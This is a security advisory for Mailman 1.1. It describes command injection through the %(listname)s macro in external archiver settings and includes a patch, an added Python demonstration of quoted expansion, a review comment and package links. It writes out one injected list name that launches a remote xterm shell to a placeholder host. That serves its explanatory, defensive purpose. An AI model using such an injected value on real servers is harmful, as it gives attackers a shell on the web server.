COMMAND
Mailman
SYSTEMS AFFECTED
Mailman 1.1 and prior with external archiving enabled
PROBLEM
Christopher P. Lindsey found the following. Mailman from www.list.org
is a mailing list manager with strong Web functionality. If a
site is running Mailman 1.1 with an external archiving mechanism
that uses the internal variable %(listname)s, list administrators
can run any command with the Webserver's uid/gid.
This bug was reported to the developers in late November, 1999,
and was fixed in the CVS source tree. Newer beta versions of
Mailman are not susceptible, but it has recently come to light
that the vulnerable 1.1 package is still available as a
stable, non-beta release on the Mailman site(s).
Mailman has a mechanism that allows messages sent to a mailing
list to be pumped into some sort of external program.
Traditionally this involves some sort of Web-based archiver like
MHonArc or hypermail. To make the archiving more powerful,
macros can be used based on internal Mailman values. For
example, list archives can be saved on a per list basis with this
line in $prefix/Mailman/mm_cfg.py:
PUBLIC_EXTERNAL_ARCHIVER = '(mhonarc -add -nolock -umask 023 -rcfile rc.%(listname)s -outdir /mnt/WWW/htdocs/lists/%(listname)s)'
The problem comes from the %(listname)s expansion. Since it's
derived from a value that can be set on a per list basis by the
list administrator, it's subject to tampering. Consider a list
whose name was changed to
/usr/X11R6/bin/xterm -display myhost.example.com:0 -e /bin/csh
by a list administrator. As soon as a message is sent to the list
this command will be executed, opening a remote xterm with a shell
running with the Web server's uid/gid. Any command available to
the Web server can be executed in this fashion.
Other variable names can be accessed if your
PUBLIC_EXTERNAL_ARCHIVER definition is configured to use them.
The patch below will only fix problems with %(listname)s
expansion.
SOLUTION
Upgrade to a later version of Mailman, or install the supplied
patch.
This patch was provided by the Mailman developers and later
cleaned up to work against a stock 1.1 distribution. It works by
only allowing list owners to change the letter case of their
list's name. Obviously a better long-term solution that sanitizes
system calls, etc. should be considered.
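To make the hazard and the patch's rule concrete, here is an added Python 3 example (not Mailman's code and not part of the advisory) that expands an archiver template the way the %(listname)s macro in mm_cfg.py does, shows how a tampered list name changes the resulting shell command, and contrasts that with an allow-listed, quoted expansion plus the case-only real_name check the patch enforces. The template (parentheses dropped so it splits cleanly), the allow-list pattern, the function names and the sample list names are constructed assumptions; the example assumes the expanded string would be handed to a POSIX shell and never executes anything.

```python
import re
import shlex

# Archiver command template in the style of the page's mm_cfg.py line
# (constructed example; the output path is not a real deployment).
PUBLIC_EXTERNAL_ARCHIVER = (
    "mhonarc -add -nolock -umask 023 -rcfile rc.%(listname)s "
    "-outdir /mnt/WWW/htdocs/lists/%(listname)s"
)

# Strict allow-list for any value substituted into a shell command.
# Assumed policy for this example, not Mailman's own list-name rule.
SAFE_LISTNAME = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._-]{0,63}$")


def expand_unsafe(template, listname):
    """Vulnerable expansion: the list name lands in the command string
    verbatim, so whitespace and shell metacharacters in it become extra
    words (and extra commands) when a shell parses the result."""
    return template % {"listname": listname}


def expand_safe(template, listname):
    """Hardened expansion: reject names outside the allow-list, then quote
    the value so a shell treats each occurrence as exactly one word."""
    if not SAFE_LISTNAME.match(listname):
        raise ValueError("list name rejected by archiver allow-list: %r" % listname)
    return template % {"listname": shlex.quote(listname)}


def argv_for(command):
    """Split the command the way a POSIX shell would (no execution),
    so the effect of a tampered name can be inspected as argv."""
    return shlex.split(command)


def real_name_change_allowed(new_value, internal_name):
    """The rule the page's patch enforces for real_name: the list owner may
    change only the letter case relative to the list's internal name."""
    return new_value.lower() == internal_name.lower()


if __name__ == "__main__":
    # Constructed sample names: one honest, one carrying extra words.
    for name in ("announce", "announce -x extra"):
        cmd = expand_unsafe(PUBLIC_EXTERNAL_ARCHIVER, name)
        print("unsafe  %-20r -> %d argv words" % (name, len(argv_for(cmd))))
        try:
            expand_safe(PUBLIC_EXTERNAL_ARCHIVER, name)
            print("safe    %-20r -> accepted" % name)
        except ValueError as exc:
            print("safe    %-20r -> %s" % (name, exc))
    print("case-only rename allowed:", real_name_change_allowed("Announce", "announce"))
    print("other rename allowed:    ", real_name_change_allowed("announce-list", "announce"))
```

The honest name expands to nine argv words; the tampered one expands to thirteen, which is exactly the extra-argument (and, with a separator character, extra-command) surface the advisory describes. The hardened path refuses it before any shell sees it, and the quoting is belt-and-braces for anything the allow-list lets through. The case-only check mirrors what the patch adds to admin.py but, as the advisory notes, covers only real_name; validation at the substitution site is what covers every macro.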
*** admin.py.bak Mon Mar 13 21:03:53 2000
--- admin.py Mon Mar 13 21:04:51 2000
***************
*** 784,789 ****
--- 784,800 ----
val = cgi_info[property].value
value = GetValidValue(lst, property, kind, val, deps)
if getattr(lst, property) != value:
+ # TBD: Ensure that lst.real_name differs only in letter
+ # case. Otherwise a security hole can potentially be opened
+ # when using an external archiver. This seems ad-hoc and
+ # could use a more general security policy.
+ if property == 'real_name' and \
+ string.lower(value) <> string.lower(lst._internal_name):
+ # then don't install this value.
+ document.AddItem("""<p><b>real_name</b> attribute not
+ changed! It must differ from the list's name by case
+ only.<p>""")
+ continue
setattr(lst, property, value)
dirty = 1
#
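Review bot: the new guard in the `if property == 'real_name'` branch only constrains real_name against `lst._internal_name`, so every other list attribute that a PUBLIC_EXTERNAL_ARCHIVER template can reach through a %(...)s macro is still stored unchanged, as the advisory's own text concedes; the durable fix is to validate or quote each value at the point where the archiver command is expanded, and the TBD comment should say so explicitly so that the check here is not mistaken for complete coverage. Smaller point: the AddItem message tells the owner what was rejected but not why it matters; one clause noting that the name is substituted into an external command would make the restriction self-explanatory to list owners.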
For FreeBSD:
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-3-stable/mail/mailman-2.0b5.tgz
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-4-stable/mail/mailman-2.0b5.tgz
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/alpha/packages-4-stable/mail/mailman-2.0b5.tgz
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-5-current/mail/mailman-2.0b5.tgz
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/alpha/packages-5-current/mail/mailman-2.0b5.tgz